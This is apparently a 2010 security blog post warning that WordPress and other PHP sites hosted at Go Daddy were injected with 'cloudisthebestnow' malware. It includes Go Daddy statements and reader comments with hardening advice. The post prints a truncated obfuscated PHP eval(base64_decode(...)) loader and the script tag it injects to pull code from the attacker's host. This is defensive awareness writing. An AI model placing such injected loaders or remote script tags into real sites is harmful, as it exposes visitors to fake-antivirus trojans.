News: WordPress Hacked with cloudisthebestnow on Go Daddy

cloudisthebestnow hack on GoDaddyOn June 8, 2010 at approximately 3pm EST self-hosted WordPress blogs, along with other PHP based websites started getting attacked with cloudisthebestnow malware. This is a server-side hacker attack. We have confirmed reports of hacked websites hosted at Go Daddy again. However, other hosting companies may also be affected.

The “cloudisthebestnow” hack attack is dangerous malware! It injects malicious script into all .php files that redirects website visitors’ to a “fake AV” program at http://cloudisthebestnow[dot]com/kp.php.

Once a website visitor is redirected, a program (known as a trojan) tries to install itself on their computer. This program executes specific actions that could potentially give the attacker complete control over an infected PC. If your website visitor has an unprotected computer, the trojan could survive on their system and open up a backdoor.

This malware tries to manipulate users into purchasing various rogue anti-spyware/virus applications, which may look like official advertisements. At this time, it is unknown what this virus may also do to an infected computer.

Cloudisthebestnow malware injects base64_decode malicious javascript containing 3,078 characters at the top all .php files. Here is a sample of some of the code:

< ?php /**/ eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNz

This encrypted code writes the following script to all infected pages:

<script src=”http://cloudisthebestnow[dot]com/kp.php”>.

This malware attack is the same person(s) as previous attacks, such as the losotrana malware attack. They share the same IP address of 193.104.34.55.

Go Daddy reached out to us to inform our community about this latest hacker attack. They have released the following statement:

***Compromised Websites Update 6/8/10***

An attack impacting several hundred accounts happened this afternoon. Go Daddy is working with other top hosting providers and security experts to gather information to stop the criminals initiating these exploits.

We have contacted the malware site registrar to remove the offending domain from the Internet, in order to block the attack.

As part of our investigation, Go Daddy has launched a fact-finding tool to collect information about your experience. If you suspect your site was impacted, please fill out our security submission form, located here – http://www.godaddy.com/securityissue.

Thank you,
Scott Gerlach
Manager of Information Security Operations
GoDaddy.com

Please check your website now and remove the malware before your site visitors get infected or your site gets blacklisted by search engines! Also, be sure you are running the latest anti-virus program on your own computer, such at *AVG, *MalwareBytes, etc. And get your site on automatic Web Integrity Monitoring at *Sucuri.net for only $7.99/month.

If you need help or don’t know how to fix your hacked WordPress website, we offer malware removal and restoration services.

We will continue to investigate this hacker attack and provide any new information on this post as it becomes available.

We need your help….

This new cloudisthebestnow[dot]com/kp.php malware was just discovered June 8, 2010. Please help spread awareness and come together as a community. Be sure to Tweet this message and also add it to your Facebook. If you have any new information, please leave a comment below so we can all help each other.

UPDATE 6/9/2010 at 12:57pm CST:

Go Daddy has just released the following updated statement regarding this malware attack.

After the most recent malware attack (more details here), the Go Daddy Security Operations Team conducted a thorough investigation and removed the malicious code impacting our customers.

The attack injects websites with a fake-antivirus pop-up ad, claiming the visitor’s computer is infected.

If you believe your website is impacted, please fill out our Security Form. Our analysts will review and, if needed, remove the offending material from your website.

Neil Warner
Go Daddy Chief Information Officer
GoDaddy.com

Securely yours,

Regina Smola
Follow me on Twitter
Follow WPSecurityLock on Twitter

Comments

  1. Arthur says

    I was hacked for the THIRD time with this. I emailed Godaddy, and do you know what they did? Sent me the very same cut and paste ‘here are the instructions on how to avoid malware’ that they send me after the first time I got hacked.

    These instructions say that, basically, Godaddy have no liability at all and it’s all my fault for using outdated software. Which I wasn’t.

    It’s almost funny how little they care.

    • Arthur says

      Forgot to mention that when I first emailed support I got all excited because I thought I was finally through to someone who could help – they seemed to be elevating my request to a special support team:

      “Due to its complex nature, your issue has been relayed to our Advanced Technical Support Team. Our most skilled technicians will be working to resolve your issue quickly and completely. You will be notified promptly upon resolution.”

      Their most skilled technicians obviously know how to cut and paste too.

        • JohnR says

          Sadly, GoDaddy’s response seems to feign caring and action, while in reality just writing off the customers that leave and probably just trying to make them up by amping the T&A marketing campaign next Superbowl…

          The epitomy of atrocious, bottom-of-the-barrel, anonymous “who cares” customer non-service, in my opinion… They’ve had months to figure this out and do something real, but to me it looks like more of the same cookie-cutter cut-and-paste lip-service do-nothing inaction, ignorance, and ineptitude. That’s my view, coming from a very technical and educated customer who knows what he’s doing – and will be finally leaving with all websites this weekend.

          http://smackdown.blogsblogsblogs.com/2010/05/13/hosting-with-godaddy-might-want-to-rethink-that-decision/

        • Arthur says

          Thanks for your reply Regina. Yes, I had contacted them through the specialist security form. They did check my site and found the suspect php files (that was the only personalized part of the email message apart from the cut and paste stuff).

          Thanks for your offer of help but I’m done – I’ll be moving all of my sites from Godaddy this weekend. I accept that hackers can be a nightmare, but I don’t accept that you can treat your customers with such indifference.

          Can I ask you – do you have any idea what is happening with these hacks and why they keep getting through? Are there blogs that you look after and have secured that have been hacked anyway? Or are we fairly sure now that this must be a server-side problem?

          • says

            Hi Arthur,

            These are server-side hacks. The malicious hackers are getting in through GoDaddy’s servers somehow and attacking sites not only with WordPress, but any php-based site.

            In my professional opinion, there is some security hole they are gaining access through. I know that GoDaddy is working on it and I can’t wait to hear that they’ve solved it.

            However, I have seen some people in the last 2 days that got hacked and they are on Hostgator. These were due to weak passwords and FTP hacks. Make sure you do everything you can to secure what you can so you are as safe as possible.

            Super strong passwords are first and foremost, then make sure that your permissions on the server are set to 755 for directories and 644 for files. There’s so much more you can do, but please make sure those are done.

          • RJ says

            Hi, I have been working on starting my own php website. I read some of your comments and I had a couple of questions. You mentioned super strong passwords as being one of the keys to securing one’s php site; what does that mean? I read somewhere that if a password has an unusual combination of ascii characters (e.g. xir9-9fbjrwq3-) that it stands out like a sore thumb to password hacking software.

            Also, I have always wondered why sites just don’t have their most important code put on some sort of read-only medium. Are there webhosters out there that have that capability?

  2. wren337 says

    Not sure if it’ll help, but after I cleaned up the infection I connected via ssh and changed all of my files to read only:
    find . -name *.php -exec chmod a-w {} ;

    Updating plugins or upgrading won’t work from the site without reverting the change (u+w), but hopefully it will “break” the virus installer too.

  3. says

    Sorry to hear about this, it is a very sad feeling when it happens, but I can tell you that this is the best reason to have a back up of your website content, and database files, because you never, know, but I left godaddy, websites, because I felt the service was not up to the same level of play as other services.

  4. Greg says

    For the fourth time on the same(Go Daddy hosted) domain in as many weeks my sites have been infected. This time WordPress in a subdomain, so far the Modx site (another subdomain) is OK, for how long I am not sure.

    These sites were all clean installs (by Go Daddy) progressively in the last three weeks, all have new ten letter four digit passwords (not cached in my browser) plus security added to login pages.
    My machine is a clean Linux based system behind a firewall and I have not been using an FTP client, only browser based work in the the framework managers.

    They can not keep these guys out. The clue is is the name of the domain “cloud is best now”, they are thumbing their noses at all PHP shared hosting and rightly so. Go Daddy have not managed to shut down the IP that was a problem three weeks ago.

    Everything I do now is going to the cloud or secure application servers.
    PHP plug and play frameworks are too dodgy on shared hosting to even contemplate as a business model, unless your business is fixing them.

    • Rick says

      Cloud hosting can get hacked too. Do a Google search for Rackspace Cloud Hacking and you’ll see they had attacks at the beginning of this year.

      It really is time for you guys to move off of GoDaddy. The longer you stay with this company the louder you tell them that you’re not worth protecting. There is no excuse for how many times you guys have been hacked.

      It’s been quiet for a little while now, and I thought maybe they finally fixed their security holes. This is absolutely ridiculous.

      • Greg says

        I agree that nothing is perfect and Godaddy is no solution at all.
        I have learned from the experience, the only sites for client’s I have left on Goddady are simple static sites that are easily moved when the hosting expires or sooner if I need too.

  5. says

    How do I know if my site has been hacked? I have a WordPress site on Godaddy. According to Google webmaster tools, my site is slower than 65% of other websites. In the past couple months, I have noticed periods where my site is unusually slow to load. In the past week, it has been down intermittently and the site is even slower when it is up. I created my own website on WordPress because I have limited technical skills. I called Godaddy 3 times and the best they could do was to suggest that i change my theme on wordpress. I use the Thesis theme, by the way. Any suggestions would be very helpful!

    • says

      Hi Kumar,

      Thanks for your comment. When did your site get hacked? Was it with the cloudisthebestnow virus or something else?

      Be sure to change all your passwords and change the secret keys in your wp-config.php files immediately.

      Let me know if you have any help.

      ~ Regina Smola

  6. says

    Sorry to hear about this, it is a very sad feeling when it happens, but I can tell you that this is the best reason to have a back up of your website content, and database files, because you never, know, but I left godaddy, websites, because I felt the service was not up to the same level of play as other services.
    tr..

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

CommentLuv badge